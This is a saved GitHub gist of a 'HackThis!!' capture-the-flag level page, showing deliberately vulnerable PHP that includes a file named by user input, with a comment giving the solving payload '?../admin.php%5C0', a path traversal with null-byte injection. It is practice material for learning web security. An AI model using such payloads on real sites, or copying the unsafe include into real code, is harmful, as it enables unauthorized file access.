Skip to content

Instantly share code, notes, and snippets.

@evandrix

evandrix/gist:4472407

Forked from trietptm/gist:4467336
Created January 7, 2013 04:45
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save evandrix/4472407 to your computer and use it in GitHub Desktop.
Save evandrix/4472407 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.txt
<!DOCTYPE HTML>
<html lang = "en">
<head>
<title>HackThis!! - Capture the Flag</title>
<meta charset = "UTF-8" />
<link href='https://fonts.googleapis.com/css?family=Ubuntu|Orbitron' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="/ctf/css/main.css">
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
</head>
<body>
<div class='level_title'>
Level 2 </div>
<div class='nav'>
<a href='/ctf/leaderboard'>Leaderboard</a> | <a href='/ctf/irc'>IRC</a> | <a href='/'>Normal Site</a> | <a href='?logout'>Logout</a>
</div>
<div class='level_container'>
<div class='msg_complete'>
Level Completed<br/>
<span class='level_time'>2h 8m 40s</span>
</div>
<a href='/ctf/3'>Next Level</a>
</div>
<div class='level_code'>
<a href='#' class='close'>[X]</a>
<div class='code'>
<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;...<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">if&nbsp;(</span><span style="color: #0000BB">$page&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">"admin"&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;!</span><span style="color: #0000BB">$user</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">isAdmin</span><span style="color: #007700">())&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;include(</span><span style="color: #DD0000">"admin.php"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;else&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;include(</span><span style="color: #DD0000">"/pages/</span><span style="color: #007700">{</span><span style="color: #0000BB">$page</span><span style="color: #007700">}</span><span style="color: #DD0000">.html"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;}<br /></span><span style="color: #0000BB">?&gt;<br /></span>
</span>
</code> </div>
</div>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-34026704-2']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<script src="/ctf/js/main.js"></script>
</body>
</html>
@evandrix
Copy link
Author

evandrix commented Jan 7, 2013

?../admin.php%5C0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment